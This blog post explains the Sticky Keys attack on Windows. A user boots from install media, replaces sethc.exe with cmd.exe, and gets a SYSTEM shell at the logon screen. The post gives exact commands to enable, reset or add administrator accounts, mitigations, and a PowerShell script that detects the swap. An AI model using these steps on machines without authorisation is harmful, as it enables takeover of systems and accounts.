Sunday, May 25, 2014

An easy way to become an administrator of a workstation, member server or domain controller

There is an easy way for a user to become an administrator of a workstation, member server or domain controller if no additional security setting such as BitLocker Drive Encryption is in place. "Sethc.exe" is the program that provides the Sticky Keys feature. When a user presses "Shift" five times on the logon screen, Windows shows a pop-up window related to "Sticky Keys".


Because the logon screen runs this program before anyone has signed in, "Sethc.exe" can be replaced with "CMD.exe" by someone who boots the machine into a pre-boot Windows environment. How is it done? Let's see the following steps.

1. Boot the computer from a Windows installation disc (it can be a USB flash drive or a DVD).
2. On the "Install Windows" screen, press "Shift + F10" to launch a Command Prompt.

3. Run "copy D:\Windows\System32\Sethc.exe D:\" to copy "Sethc.exe" to the root of the D drive as a backup. In my lab environment, the Windows folder is under D:\.

4. Run "copy D:\Windows\System32\cmd.exe D:\Windows\System32\Sethc.exe /y" to copy "CMD.exe" over "Sethc.exe", replacing it.

5. Exit the Command Prompt.
6. Restart the workstation.

7. On the Windows logon screen, press "Shift" five times.

A Command Prompt is launched.

8. Run "whoami" to check the current user of this Command Prompt.


The rights of NT AUTHORITY\SYSTEM are the same as those of a local administrator.

Now this user can run "net user administrator /active:yes" to enable the built-in administrator account.


The user can then run "net user administrator abcd1234" to change the password of the local administrator.


Or run "net localgroup administrators /add userb" to add "Userb" to the local Administrators group.


To prevent this issue, administrators can deploy BitLocker on all workstations so that the System32 folder cannot be modified offline, and they can also configure a BIOS password to stop someone from booting from a USB flash drive or a DVD.
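As an added example that is not part of the original post, the following PowerShell script lets an administrator check a running machine for the two things this post describes: whether "Sethc.exe" has been swapped for "CMD.exe" (including the backup copy the steps above leave at the root of the system drive), and whether the BitLocker countermeasure is actually turned on for the OS volume. It assumes local administrator rights, PowerShell 4 or later (for Get-FileHash), and the BitLocker module that ships with Windows 8 / Server 2012 and later (for Get-BitLockerVolume).

```powershell
# Added check script (not from the original post).
# Assumptions: run as a local administrator on the live OS, PowerShell 4+,
# BitLocker PowerShell module present (Windows 8 / Server 2012 or later).

$sys32    = Join-Path $env:SystemRoot 'System32'
$sethcPath = Join-Path $sys32 'sethc.exe'
$cmdPath   = Join-Path $sys32 'cmd.exe'

# 1. Compare the Sticky Keys binary against cmd.exe. A straight file copy,
#    as in the post, gives both files an identical SHA-256 hash.
$cmdHash   = (Get-FileHash -Path $cmdPath   -Algorithm SHA256).Hash
$sethcHash = (Get-FileHash -Path $sethcPath -Algorithm SHA256).Hash

# The version resource survives the copy, so a replaced sethc.exe still
# reports cmd.exe's original file name.
$origName = (Get-Item $sethcPath).VersionInfo.OriginalFilename

if ($sethcHash -eq $cmdHash) {
    Write-Warning "sethc.exe has the same SHA-256 as cmd.exe: it has been replaced."
} elseif ($origName -and $origName -notlike 'sethc*') {
    Write-Warning "sethc.exe reports OriginalFilename '$origName': unexpected binary."
} else {
    Write-Output "sethc.exe looks unmodified (OriginalFilename '$origName')."
}

# 2. Step 3 of the post leaves a backup copy at the root of the Windows drive.
$strayBackup = Join-Path $env:SystemDrive 'Sethc.exe'
if (Test-Path $strayBackup) {
    Write-Warning "Found $strayBackup - a stray copy of sethc.exe outside System32."
}

# 3. The post's countermeasure is BitLocker on the OS volume; verify it is On.
$osVol = Get-BitLockerVolume -MountPoint $env:SystemDrive
if ($osVol.ProtectionStatus -ne 'On') {
    Write-Warning "BitLocker protection is '$($osVol.ProtectionStatus)' on $env:SystemDrive; offline edits to System32 are possible."
} else {
    Write-Output "BitLocker protection is On for $env:SystemDrive."
}
```

Run it from an elevated PowerShell prompt. The hash comparison is the reliable signal: because both cmd.exe and sethc.exe are Microsoft-signed, a signature check alone would not flag the swap.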

Windows 8 and Windows 8.1 are affected by this same issue.

Additional information
You can also use the above steps to reset the Windows domain administrator password.

Vladan SEGET, a VMware vExpert, wrote detailed steps for resetting the Windows domain administrator password. If you're interested, please read How-to Reset Windows Domain Administrator Password.

This posting is provided “AS IS” with no warranties, and confers no rights!
